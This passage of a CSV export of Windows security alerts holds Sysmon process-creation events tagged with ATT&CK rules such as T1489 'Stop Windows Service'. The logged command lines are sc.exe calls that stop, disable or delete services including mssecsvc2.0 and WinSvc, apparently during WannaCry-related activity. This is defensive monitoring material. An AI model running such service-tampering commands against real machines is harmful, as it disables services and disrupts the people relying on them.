Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.072",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.823 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-001018272100} +ProcessId: 5176 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.825429300Z"",""eventRecordID"":""2687"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.823\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-001018272100}\r\nProcessId: 5176\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.823"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-001018272100}"",""processId"":""5176"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.056",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.802 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00103a262100} +ProcessId: 2128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.804673000Z"",""eventRecordID"":""2686"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.802\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00103a262100}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.802"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00103a262100}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.009",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.758 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010e5232100} +ProcessId: 6548 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.760270500Z"",""eventRecordID"":""2683"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.758\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010e5232100}\r\nProcessId: 6548\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.758"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010e5232100}"",""processId"":""6548"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.699 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c212100} +ProcessId: 2360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.702180600Z"",""eventRecordID"":""2680"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.699\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c212100}\r\nProcessId: 2360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.699"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00108c212100}"",""processId"":""2360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.947",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.679 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010c4202100} +ProcessId: 8064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinSvc Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinSvc Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.680955900Z"",""eventRecordID"":""2679"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.679\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010c4202100}\r\nProcessId: 8064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinSvc Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.679"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010c4202100}"",""processId"":""8064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinSvc Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.916",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.643 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010341f2100} +ProcessId: 2096 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.645750400Z"",""eventRecordID"":""2677"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.643\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010341f2100}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.643"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010341f2100}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.841",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.596 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010de1c2100} +ProcessId: 6588 +Image: C:\Windows\System32\sc.exe +FileVersion: 